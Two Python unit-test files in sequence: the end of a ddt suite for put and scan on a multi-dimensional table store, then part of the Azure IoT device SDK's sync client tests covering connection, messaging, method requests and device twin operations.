self.assertIn(rsp_msg, rs1)
if scan_kv != {}:
rs2 = self.scan(self.leader, self.tid, self.pid, scan_kv, self.now(), 1)
infoLogger.info(rs2)
self.assertIn(' ' + str(scan_value) + ' ', rs2)
@multi_dimension(True)
@ddt.data(
({'card': ('string:index', '0'), 's2': ('string', '\\"\\"\'\'^\\n')},
'Put ok', {'card': '0'}, '\"\"\'\'^\\n'),
({'card': ('string:index', '1'), 's2': ('string', '" "')},
'Bad put format, eg put tid pid time value', {}, ''),
({'card': ('string:index', '2'), 's2': ('string', 'a' * 128)},
'Put ok', {'card': '2'}, 'a' * 128),
({'card': ('string:index', '3'), 's2': ('string', 'a' * 129)},
'Put ok', {'card': '3'}, 'a' * 129),
)
@ddt.unpack
def test_sput_string(self, kv, rsp_msg, scan_kv, scan_value):
"""
Create a multi-dimensional table and test the string type.
:return:
"""
self.create(self.leader, 't', self.tid, self.pid, 144000, 2, 'true', **{k: v[0] for k, v in kv.items()})
rs1 = self.put(self.leader, self.tid, self.pid, '', self.now(), *[str(v[1]) for v in kv.values()])
infoLogger.info(rs1)
self.assertIn(rsp_msg, rs1)
infoLogger.info(self.scan(
self.leader, self.tid, self.pid, scan_kv, self.now(), 1))
if scan_kv != {}:
self.assertIn(' ' + str(scan_value) + ' ', self.scan(
self.leader, self.tid, self.pid, scan_kv, self.now(), 1))
@multi_dimension(True)
@ddt.data(
({'card': ('string:index', '0'), 's2': ('float', 10.0)}, 'Put ok', {'card': '0'}, '10'),
({'card': ('string:index', '1'), 's2': ('float', 10.01)}, 'Put ok', {'card': '1'}, '10.0100002'),
({'card': ('string:index', '2'), 's2': ('float', -1e-1)}, 'Put ok', {'card': '2'}, '-0.100000001'),
({'card': ('string:index', '3'), 's2': ('float', 1e-10)}, 'Put ok', {'card': '3'}, '1.00000001e-10'),
({'card': ('string:index', '4'), 's2': ('double', -10.01)}, 'Put ok', {'card': '4'}, '-10.01'),
({'card': ('string:index', '5'), 's2': ('double', -1e-1)}, 'Put ok', {'card': '5'}, '-0.10000000000000001'),
({'card': ('string:index', '6'), 's2': ('double', 1e-10)}, 'Put ok', {'card': '6'}, '1e-10'),
)
@ddt.unpack
def test_sput_float_double(self, kv, rsp_msg, scan_kv, scan_value):
"""
Create a multi-dimensional table and test the float and double types.
:return:
"""
self.create(self.leader, 't', self.tid, self.pid, 144000, 2, 'true', **{k: v[0] for k, v in kv.items()})
rs1 = self.put(self.leader, self.tid, self.pid, '', self.now(), *[str(v[1]) for v in kv.values()])
self.assertIn(rsp_msg, rs1)
rs2 = self.scan(self.leader, self.tid, self.pid, scan_kv, self.now(), 1)
infoLogger.info(rs2)
self.assertIn(' ' + scan_value + ' ', rs2)
if __name__ == "__main__":
load(TestPut)
|
test_sync_clients.py
|
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
import pytest
import logging
import threading
import time
import os
import io
import six
from azure.iot.device.iothub import IoTHubDeviceClient, IoTHubModuleClient
from azure.iot.device import exceptions as client_exceptions
from azure.iot.device.iothub.pipeline import constant as pipeline_constant
from azure.iot.device.iothub.pipeline import exceptions as pipeline_exceptions
from azure.iot.device.iothub.models import Message, MethodRequest
from azure.iot.device.iothub.sync_inbox import SyncClientInbox
from azure.iot.device.iothub.abstract_clients import (
RECEIVE_TYPE_NONE_SET,
RECEIVE_TYPE_HANDLER,
RECEIVE_TYPE_API,
)
from azure.iot.device import constant as device_constant
from .shared_client_tests import (
SharedIoTHubClientInstantiationTests,
SharedIoTHubClientPROPERTYHandlerTests,
SharedIoTHubClientPROPERTYConnectedTests,
SharedIoTHubClientOCCURANCEConnectTests,
SharedIoTHubClientOCCURANCEDisconnectTests,
SharedIoTHubClientCreateFromConnectionStringTests,
SharedIoTHubDeviceClientCreateFromSymmetricKeyTests,
SharedIoTHubDeviceClientCreateFromX509CertificateTests,
SharedIoTHubModuleClientCreateFromX509CertificateTests,
SharedIoTHubModuleClientCreateFromEdgeEnvironmentWithContainerEnvTests,
SharedIoTHubModuleClientCreateFromEdgeEnvironmentWithDebugEnvTests,
)
logging.basicConfig(level=logging.DEBUG)
##################
# INFRASTRUCTURE #
##################
# TODO: now that there are EventedCallbacks, tests should be updated to test their use
# (which is much simpler than this infrastructure)
class WaitsForEventCompletion(object):
def add_event_completion_checks(self, mocker, pipeline_function, args=[], kwargs={}):
event_init_mock = mocker.patch.object(threading, "Event")
event_mock = event_init_mock.return_value
def check_callback_completes_event():
# Assert exactly one Event was instantiated so we know the following asserts
# are related to the code under test ONLY
assert event_init_mock.call_count == 1
# Assert waiting for Event to complete
assert event_mock.wait.call_count == 1
assert event_mock.set.call_count == 0
# Manually trigger callback
cb = pipeline_function.call_args[1]["callback"]
cb(*args, **kwargs)
# Assert Event is now completed
assert event_mock.set.call_count == 1
event_mock.wait.side_effect = check_callback_completes_event
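# Net effect: when the client calls event.wait(), the checks above run, the pipeline
# callback is completed manually, and we confirm the client blocked until completion.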
##########################
# SHARED CLIENT FIXTURES #
##########################
@pytest.fixture
def handler():
def _handler_function(arg):
pass
return _handler_function
#######################
# SHARED CLIENT TESTS #
#######################
class SharedClientConnectTests(WaitsForEventCompletion):
@pytest.mark.it("Begins a 'connect' pipeline operation")
def test_calls_pipeline_connect(self, client, mqtt_pipeline):
client.connect()
assert mqtt_pipeline.connect.call_count == 1
@pytest.mark.it("Waits for the completion of the 'connect' pipeline operation before returning")
def test_waits_for_pipeline_op_completion(
self, mocker, client_manual_cb, mqtt_pipeline_manual_cb
):
self.add_event_completion_checks(
mocker=mocker, pipeline_function=mqtt_pipeline_manual_cb.connect
)
client_manual_cb.connect()
@pytest.mark.it(
"Raises a client error if the `connect` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ConnectionDroppedError,
client_exceptions.ConnectionDroppedError,
id="ConnectionDroppedError->ConnectionDroppedError",
),
pytest.param(
pipeline_exceptions.ConnectionFailedError,
client_exceptions.ConnectionFailedError,
id="ConnectionFailedError->ConnectionFailedError",
),
pytest.param(
pipeline_exceptions.UnauthorizedError,
client_exceptions.CredentialError,
id="UnauthorizedError->CredentialError",
),
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(
pipeline_exceptions.TlsExchangeAuthError,
client_exceptions.ClientError,
id="TlsExchangeAuthError->ClientError",
),
pytest.param(
pipeline_exceptions.ProtocolProxyError,
client_exceptions.ClientError,
id="ProtocolProxyError->ClientError",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self, mocker, client_manual_cb, mqtt_pipeline_manual_cb, pipeline_error, client_error
):
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=mqtt_pipeline_manual_cb.connect,
kwargs={"error": my_pipeline_error},
)
with pytest.raises(client_error) as e_info:
client_manual_cb.connect()
assert e_info.value.__cause__ is my_pipeline_error
class SharedClientDisconnectTests(WaitsForEventCompletion):
@pytest.mark.it(
"Runs a 'disconnect' pipeline operation, stops the handler manager, then runs a second 'disconnect' pipeline operation"
)
def test_calls_pipeline_disconnect(self, mocker, client, mqtt_pipeline):
manager_mock = mocker.MagicMock()
client._handler_manager = mocker.MagicMock()
manager_mock.attach_mock(mqtt_pipeline.disconnect, "disconnect")
manager_mock.attach_mock(client._handler_manager.stop, "stop")
client.disconnect()
assert mqtt_pipeline.disconnect.call_count == 2
assert client._handler_manager.stop.call_count == 1
assert manager_mock.mock_calls == [
mocker.call.disconnect(callback=mocker.ANY),
mocker.call.stop(),
mocker.call.disconnect(callback=mocker.ANY),
]
@pytest.mark.it(
"Waits for the completion of both 'disconnect' pipeline operations before returning"
)
def test_waits_for_pipeline_op_completion(self, mocker, client, mqtt_pipeline):
cb_mock1 = mocker.MagicMock()
cb_mock2 = mocker.MagicMock()
mocker.patch("azure.iot.device.iothub.sync_clients.EventedCallback").side_effect = [
cb_mock1,
cb_mock2,
]
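# Successive EventedCallback() constructions inside disconnect() return cb_mock1, then cb_mock2.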
client.disconnect()
# Disconnect called twice
assert mqtt_pipeline.disconnect.call_count == 2
# Assert callbacks sent to pipeline
assert mqtt_pipeline.disconnect.call_args_list[0][1]["callback"] is cb_mock1
assert mqtt_pipeline.disconnect.call_args_list[1][1]["callback"] is cb_mock2
# Assert callback completions were waited upon
assert cb_mock1.wait_for_completion.call_count == 1
assert cb_mock2.wait_for_completion.call_count == 1
@pytest.mark.it(
"Raises a client error if the `disconnect` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self, mocker, client_manual_cb, mqtt_pipeline_manual_cb, pipeline_error, client_error
):
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=mqtt_pipeline_manual_cb.disconnect,
kwargs={"error": my_pipeline_error},
)
with pytest.raises(client_error) as e_info:
client_manual_cb.disconnect()
assert e_info.value.__cause__ is my_pipeline_error
class SharedClientSendD2CMessageTests(WaitsForEventCompletion):
@pytest.mark.it("Begins a 'send_message' MQTTPipeline operation")
def test_calls_pipeline_send_message(self, client, mqtt_pipeline, message):
client.send_message(message)
assert mqtt_pipeline.send_message.call_count == 1
assert mqtt_pipeline.send_message.call_args[0][0] is message
@pytest.mark.it(
"Waits for the completion of the 'send_message' pipeline operation before returning"
)
def test_waits_for_pipeline_op_completion(
self, mocker, client_manual_cb, mqtt_pipeline_manual_cb, message
):
self.add_event_completion_checks(
mocker=mocker, pipeline_function=mqtt_pipeline_manual_cb.send_message
)
client_manual_cb.send_message(message)
@pytest.mark.it(
"Raises a client error if the `send_message` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ConnectionDroppedError,
client_exceptions.ConnectionDroppedError,
id="ConnectionDroppedError->ConnectionDroppedError",
),
pytest.param(
pipeline_exceptions.ConnectionFailedError,
client_exceptions.ConnectionFailedError,
id="ConnectionFailedError->ConnectionFailedError",
),
pytest.param(
pipeline_exceptions.UnauthorizedError,
client_exceptions.CredentialError,
id="UnauthorizedError->CredentialError",
),
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self,
mocker,
client_manual_cb,
mqtt_pipeline_manual_cb,
message,
pipeline_error,
client_error,
):
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=mqtt_pipeline_manual_cb.send_message,
kwargs={"error": my_pipeline_error},
)
with pytest.raises(client_error) as e_info:
client_manual_cb.send_message(message)
assert e_info.value.__cause__ is my_pipeline_error
@pytest.mark.it(
"Wraps 'message' input parameter in a Message object if it is not a Message object"
)
@pytest.mark.parametrize(
"message_input",
[
pytest.param("message", id="String input"),
pytest.param(222, id="Integer input"),
pytest.param(object(), id="Object input"),
pytest.param(None, id="None input"),
pytest.param([1, "str"], id="List input"),
pytest.param({"a": 2}, id="Dictionary input"),
],
)
def test_wraps_data_in_message_and_calls_pipeline_send_message(
self, client, mqtt_pipeline, message_input
):
client.send_message(message_input)
assert mqtt_pipeline.send_message.call_count == 1
sent_message = mqtt_pipeline.send_message.call_args[0][0]
assert isinstance(sent_message, Message)
assert sent_message.data == message_input
@pytest.mark.it("Raises error when message data size is greater than 256 KB")
def test_raises_error_when_message_data_greater_than_256(self, client, mqtt_pipeline):
data_input = "serpensortia" * 25600
message = Message(data_input)
with pytest.raises(ValueError) as e_info:
client.send_message(message)
assert "256 KB" in e_info.value.args[0]
assert mqtt_pipeline.send_message.call_count == 0
@pytest.mark.it("Raises error when message size is greater than 256 KB")
def test_raises_error_when_message_size_greater_than_256(self, client, mqtt_pipeline):
data_input = "serpensortia"
message = Message(data_input)
message.custom_properties["spell"] = data_input * 25600
with pytest.raises(ValueError) as e_info:
client.send_message(message)
assert "256 KB" in e_info.value.args[0]
assert mqtt_pipeline.send_message.call_count == 0
@pytest.mark.it("Does not raises error when message data size is equal to 256 KB")
def test_raises_error_when_message_data_equal_to_256(self, client, mqtt_pipeline):
data_input = "a" * 262095
message = Message(data_input)
# This check exists because the Message class may change its default content type
# encoding, which would change the size calculated above.
# A greater-than check is needed for Python 2; ideally this would be a not-equal check.
if message.get_size() > device_constant.TELEMETRY_MESSAGE_SIZE_LIMIT:
assert False
client.send_message(message)
assert mqtt_pipeline.send_message.call_count == 1
sent_message = mqtt_pipeline.send_message.call_args[0][0]
assert isinstance(sent_message, Message)
assert sent_message.data == data_input
class SharedClientReceiveMethodRequestTests(object):
@pytest.mark.it("Implicitly enables methods feature if not already enabled")
@pytest.mark.parametrize(
"method_name",
[pytest.param(None, id="Generic Method"), pytest.param("method_x", id="Named Method")],
)
def test_enables_methods_only_if_not_already_enabled(
self, mocker, client, mqtt_pipeline, method_name
):
mocker.patch.object(SyncClientInbox, "get")  # patch this so receive_method_request won't block
# Verify the Methods feature is enabled if not already enabled
mqtt_pipeline.feature_enabled.__getitem__.return_value = (
False
) # Method Requests will appear disabled
client.receive_method_request(method_name)
assert mqtt_pipeline.enable_feature.call_count == 1
assert mqtt_pipeline.enable_feature.call_args[0][0] == pipeline_constant.METHODS
mqtt_pipeline.enable_feature.reset_mock()
# Verify the Methods feature is not re-enabled if already enabled
mqtt_pipeline.feature_enabled.__getitem__.return_value = (
True
) # Method Requests will appear enabled
client.receive_method_request(method_name)
assert mqtt_pipeline.enable_feature.call_count == 0
@pytest.mark.it(
"Returns a MethodRequest from the generic method inbox, if available, when called without method name"
)
def test_called_without_method_name_returns_method_request_from_generic_method_inbox(
self, mocker, client
):
request = MethodRequest(request_id="1", name="some_method", payload={"key": "value"})
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
inbox_mock.get.return_value = request
manager_get_inbox_mock = mocker.patch.object(
target=client._inbox_manager,
attribute="get_method_request_inbox",
return_value=inbox_mock,
)
received_request = client.receive_method_request()
assert manager_get_inbox_mock.call_count == 1
assert manager_get_inbox_mock.call_args == mocker.call(None)
assert inbox_mock.get.call_count == 1
assert received_request is request
@pytest.mark.it(
"Returns MethodRequest from the corresponding method inbox, if available, when called with a method name"
)
def test_called_with_method_name_returns_method_request_from_named_method_inbox(
self, mocker, client
):
method_name = "some_method"
request = MethodRequest(request_id="1", name=method_name, payload={"key": "value"})
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
inbox_mock.get.return_value = request
manager_get_inbox_mock = mocker.patch.object(
target=client._inbox_manager,
attribute="get_method_request_inbox",
return_value=inbox_mock,
)
received_request = client.receive_method_request(method_name)
assert manager_get_inbox_mock.call_count == 1
assert manager_get_inbox_mock.call_args == mocker.call(method_name)
assert inbox_mock.get.call_count == 1
assert received_request is request
@pytest.mark.it("Can be called in various modes")
@pytest.mark.parametrize(
"method_name",
[pytest.param(None, id="Generic Method"), pytest.param("method_x", id="Named Method")],
)
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_receive_method_request_can_be_called_in_mode(
self, mocker, client, block, timeout, method_name
):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(
target=client._inbox_manager,
attribute="get_method_request_inbox",
return_value=inbox_mock,
)
client.receive_method_request(method_name=method_name, block=block, timeout=timeout)
assert inbox_mock.get.call_count == 1
assert inbox_mock.get.call_args == mocker.call(block=block, timeout=timeout)
@pytest.mark.it("Defaults to blocking mode with no timeout")
@pytest.mark.parametrize(
"method_name",
[pytest.param(None, id="Generic Method"), pytest.param("method_x", id="Named Method")],
)
def test_receive_method_request_default_mode(self, mocker, client, method_name):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(
target=client._inbox_manager,
attribute="get_method_request_inbox",
return_value=inbox_mock,
)
client.receive_method_request(method_name=method_name)
assert inbox_mock.get.call_count == 1
assert inbox_mock.get.call_args == mocker.call(block=True, timeout=None)
@pytest.mark.it("Blocks until a method request is available, in blocking mode")
@pytest.mark.parametrize(
"method_name",
[pytest.param(None, id="Generic Method"), pytest.param("method_x", id="Named Method")],
)
def test_no_method_request_in_inbox_blocking_mode(self, client, method_name):
request = MethodRequest(request_id="1", name=method_name, payload={"key": "value"})
inbox = client._inbox_manager.get_method_request_inbox(method_name)
assert inbox.empty()
def insert_item_after_delay():
time.sleep(0.01)
inbox._put(request)
insertion_thread = threading.Thread(target=insert_item_after_delay)
insertion_thread.start()
received_request = client.receive_method_request(method_name, block=True)
assert received_request is request
# This proves that the blocking happens because 'received_request' can't be
# 'request' until after a 10 millisecond delay on the insert. But because the
# 'received_request' IS 'request', it means that client.receive_method_request
# did not return until after the delay.
@pytest.mark.it(
"Returns None after a timeout while blocking, in blocking mode with a specified timeout"
)
@pytest.mark.parametrize(
"method_name",
[pytest.param(None, id="Generic Method"), pytest.param("method_x", id="Named Method")],
)
def test_times_out_waiting_for_message_blocking_mode(self, client, method_name):
result = client.receive_method_request(method_name, block=True, timeout=0.01)
assert result is None
@pytest.mark.it("Returns None immediately if there are no messages, in nonblocking mode")
@pytest.mark.parametrize(
"method_name",
[pytest.param(None, id="Generic Method"), pytest.param("method_x", id="Named Method")],
)
def test_no_message_in_inbox_nonblocking_mode(self, client, method_name):
result = client.receive_method_request(method_name, block=False)
assert result is None
@pytest.mark.it("Locks the client to API Receive Mode if the receive mode has not yet been set")
@pytest.mark.parametrize(
"method_name",
[pytest.param(None, id="Generic Method"), pytest.param("method_x", id="Named Method")],
)
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_receive_mode_not_set(self, mocker, client, method_name, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(
client._inbox_manager, "get_method_request_inbox", return_value=inbox_mock
)
assert client._receive_type is RECEIVE_TYPE_NONE_SET
client.receive_method_request(method_name=method_name, block=block, timeout=timeout)
assert client._receive_type is RECEIVE_TYPE_API
@pytest.mark.it(
"Does not modify the client receive mode if it has already been set to API Receive Mode"
)
@pytest.mark.parametrize(
"method_name",
[pytest.param(None, id="Generic Method"), pytest.param("method_x", id="Named Method")],
)
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_receive_mode_set_api(self, mocker, client, method_name, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(
client._inbox_manager, "get_method_request_inbox", return_value=inbox_mock
)
client._receive_type = RECEIVE_TYPE_API
client.receive_method_request(method_name=method_name, block=block, timeout=timeout)
assert client._receive_type is RECEIVE_TYPE_API
@pytest.mark.it(
"Raises a ClientError and does nothing else if the client receive mode has been set to Handler Receive Mode"
)
@pytest.mark.parametrize(
"method_name",
[pytest.param(None, id="Generic Method"), pytest.param("method_x", id="Named Method")],
)
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_receive_mode_set_handler(
self, mocker, client, mqtt_pipeline, method_name, block, timeout
):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(
client._inbox_manager, "get_method_request_inbox", return_value=inbox_mock
)
# patch this so we can make sure feature enabled isn't modified
mqtt_pipeline.feature_enabled.__getitem__.return_value = False
client._receive_type = RECEIVE_TYPE_HANDLER
# Error was raised
with pytest.raises(client_exceptions.ClientError):
client.receive_method_request(method_name=method_name, block=block, timeout=timeout)
# Feature was not enabled
assert mqtt_pipeline.enable_feature.call_count == 0
# Inbox get was not called
assert inbox_mock.get.call_count == 0
class SharedClientSendMethodResponseTests(WaitsForEventCompletion):
@pytest.mark.it("Begins a 'send_method_response' pipeline operation")
def test_send_method_response_calls_pipeline(self, client, mqtt_pipeline, method_response):
client.send_method_response(method_response)
assert mqtt_pipeline.send_method_response.call_count == 1
assert mqtt_pipeline.send_method_response.call_args[0][0] is method_response
@pytest.mark.it(
"Waits for the completion of the 'send_method_response' pipeline operation before returning"
)
def test_waits_for_pipeline_op_completion(
self, mocker, client_manual_cb, mqtt_pipeline_manual_cb, method_response
):
self.add_event_completion_checks(
mocker=mocker, pipeline_function=mqtt_pipeline_manual_cb.send_method_response
)
client_manual_cb.send_method_response(method_response)
@pytest.mark.it(
"Raises a client error if the `send_method_response` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ConnectionDroppedError,
client_exceptions.ConnectionDroppedError,
id="ConnectionDroppedError->ConnectionDroppedError",
),
pytest.param(
pipeline_exceptions.ConnectionFailedError,
client_exceptions.ConnectionFailedError,
id="ConnectionFailedError->ConnectionFailedError",
),
pytest.param(
pipeline_exceptions.UnauthorizedError,
client_exceptions.CredentialError,
id="UnauthorizedError->CredentialError",
),
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self,
mocker,
client_manual_cb,
mqtt_pipeline_manual_cb,
method_response,
pipeline_error,
client_error,
):
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=mqtt_pipeline_manual_cb.send_method_response,
kwargs={"error": my_pipeline_error},
)
with pytest.raises(client_error) as e_info:
client_manual_cb.send_method_response(method_response)
assert e_info.value.__cause__ is my_pipeline_error
class SharedClientGetTwinTests(WaitsForEventCompletion):
@pytest.fixture
def patch_get_twin_to_return_fake_twin(self, fake_twin, mocker, mqtt_pipeline):
def immediate_callback(callback):
callback(twin=fake_twin)
mocker.patch.object(mqtt_pipeline, "get_twin", side_effect=immediate_callback)
@pytest.mark.it("Implicitly enables twin messaging feature if not already enabled")
def test_enables_twin_only_if_not_already_enabled(
self, mocker, client, mqtt_pipeline, patch_get_twin_to_return_fake_twin, fake_twin
):
# Verify twin enabled if not enabled
mqtt_pipeline.feature_enabled.__getitem__.return_value = False # twin will appear disabled
client.get_twin()
assert mqtt_pipeline.enable_feature.call_count == 1
assert mqtt_pipeline.enable_feature.call_args[0][0] == pipeline_constant.TWIN
mqtt_pipeline.enable_feature.reset_mock()
# Verify twin not enabled if already enabled
mqtt_pipeline.feature_enabled.__getitem__.return_value = True # twin will appear enabled
client.get_twin()
assert mqtt_pipeline.enable_feature.call_count == 0
@pytest.mark.it("Begins a 'get_twin' pipeline operation")
def test_get_twin_calls_pipeline(self, client, mqtt_pipeline):
client.get_twin()
assert mqtt_pipeline.get_twin.call_count == 1
@pytest.mark.it(
"Waits for the completion of the 'get_twin' pipeline operation before returning"
)
def test_waits_for_pipeline_op_completion(
self, mocker, client_manual_cb, mqtt_pipeline_manual_cb, fake_twin
):
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=mqtt_pipeline_manual_cb.get_twin,
kwargs={"twin": fake_twin},
)
client_manual_cb.get_twin()
@pytest.mark.it(
"Raises a client error if the `get_twin` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ConnectionDroppedError,
client_exceptions.ConnectionDroppedError,
id="ConnectionDroppedError->ConnectionDroppedError",
),
pytest.param(
pipeline_exceptions.ConnectionFailedError,
client_exceptions.ConnectionFailedError,
id="ConnectionFailedError->ConnectionFailedError",
),
pytest.param(
pipeline_exceptions.UnauthorizedError,
client_exceptions.CredentialError,
id="UnauthorizedError->CredentialError",
),
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self, mocker, client_manual_cb, mqtt_pipeline_manual_cb, pipeline_error, client_error
):
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=mqtt_pipeline_manual_cb.get_twin,
kwargs={"error": my_pipeline_error},
)
with pytest.raises(client_error) as e_info:
client_manual_cb.get_twin()
assert e_info.value.__cause__ is my_pipeline_error
@pytest.mark.it("Returns the twin that the pipeline returned")
def test_verifies_twin_returned(
self, mocker, client_manual_cb, mqtt_pipeline_manual_cb, fake_twin
):
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=mqtt_pipeline_manual_cb.get_twin,
kwargs={"twin": fake_twin},
)
returned_twin = client_manual_cb.get_twin()
assert returned_twin == fake_twin
class SharedClientPatchTwinReportedPropertiesTests(WaitsForEventCompletion):
@pytest.mark.it("Implicitly enables twin messaging feature if not already enabled")
def test_enables_twin_only_if_not_already_enabled(
self, mocker, client, mqtt_pipeline, twin_patch_reported
):
# patch this so patch_twin_reported_properties won't block
def immediate_callback(patch, callback):
callback()
mocker.patch.object(
mqtt_pipeline, "patch_twin_reported_properties", side_effect=immediate_callback
)
# Verify twin enabled if not enabled
mqtt_pipeline.feature_enabled.__getitem__.return_value = False # twin will appear disabled
client.patch_twin_reported_properties(twin_patch_reported)
assert mqtt_pipeline.enable_feature.call_count == 1
assert mqtt_pipeline.enable_feature.call_args[0][0] == pipeline_constant.TWIN
mqtt_pipeline.enable_feature.reset_mock()
# Verify twin not enabled if already enabled
mqtt_pipeline.feature_enabled.__getitem__.return_value = True # twin will appear enabled
client.patch_twin_reported_properties(twin_patch_reported)
assert mqtt_pipeline.enable_feature.call_count == 0
@pytest.mark.it("Begins a 'patch_twin_reported_properties' pipeline operation")
def test_patch_twin_reported_properties_calls_pipeline(
self, client, mqtt_pipeline, twin_patch_reported
):
client.patch_twin_reported_properties(twin_patch_reported)
assert mqtt_pipeline.patch_twin_reported_properties.call_count == 1
assert (
mqtt_pipeline.patch_twin_reported_properties.call_args[1]["patch"]
is twin_patch_reported
)
@pytest.mark.it(
"Waits for the completion of the 'patch_twin_reported_properties' pipeline operation before returning"
)
def test_waits_for_pipeline_op_completion(
self, mocker, client_manual_cb, mqtt_pipeline_manual_cb, twin_patch_reported
):
self.add_event_completion_checks(
mocker=mocker, pipeline_function=mqtt_pipeline_manual_cb.patch_twin_reported_properties
)
client_manual_cb.patch_twin_reported_properties(twin_patch_reported)
@pytest.mark.it(
"Raises a client error if the `patch_twin_reported_properties` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ConnectionDroppedError,
client_exceptions.ConnectionDroppedError,
id="ConnectionDroppedError->ConnectionDroppedError",
),
pytest.param(
pipeline_exceptions.ConnectionFailedError,
client_exceptions.ConnectionFailedError,
id="ConnectionFailedError->ConnectionFailedError",
),
pytest.param(
pipeline_exceptions.UnauthorizedError,
client_exceptions.CredentialError,
id="UnauthorizedError->CredentialError",
),
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self,
mocker,
client_manual_cb,
mqtt_pipeline_manual_cb,
twin_patch_reported,
pipeline_error,
client_error,
):
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=mqtt_pipeline_manual_cb.patch_twin_reported_properties,
kwargs={"error": my_pipeline_error},
)
with pytest.raises(client_error) as e_info:
client_manual_cb.patch_twin_reported_properties(twin_patch_reported)
assert e_info.value.__cause__ is my_pipeline_error
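# Shared tests for receiving twin desired properties patches, covering implicit feature enablement and API/Handler receive mode locking.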
class SharedClientReceiveTwinDesiredPropertiesPatchTests(object):
@pytest.mark.it(
"Implicitly enables Twin desired properties patch feature if not already enabled"
)
def test_enables_twin_patches_only_if_not_already_enabled(self, mocker, client, mqtt_pipeline):
mocker.patch.object(
SyncClientInbox, "get"
) # patch this so receive_twin_desired_properties_patch won't block
# Verify twin patches enabled if not enabled
mqtt_pipeline.feature_enabled.__getitem__.return_value = (
False
) # twin patches will appear disabled
client.receive_twin_desired_properties_patch()
assert mqtt_pipeline.enable_feature.call_count == 1
assert mqtt_pipeline.enable_feature.call_args[0][0] == pipeline_constant.TWIN_PATCHES
mqtt_pipeline.enable_feature.reset_mock()
# Verify twin patches not enabled if already enabled
mqtt_pipeline.feature_enabled.__getitem__.return_value = True # twin patches will appear enabled
client.receive_twin_desired_properties_patch()
assert mqtt_pipeline.enable_feature.call_count == 0
@pytest.mark.it("Returns a patch from the twin patch inbox, if available")
def test_returns_message_from_twin_patch_inbox(self, mocker, client, twin_patch_desired):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
inbox_mock.get.return_value = twin_patch_desired
manager_get_inbox_mock = mocker.patch.object(
client._inbox_manager, "get_twin_patch_inbox", return_value=inbox_mock
)
received_patch = client.receive_twin_desired_properties_patch()
assert manager_get_inbox_mock.call_count == 1
assert inbox_mock.get.call_count == 1
assert received_patch is twin_patch_desired
@pytest.mark.it("Can be called in various modes")
@pytest.mark.parametrize(
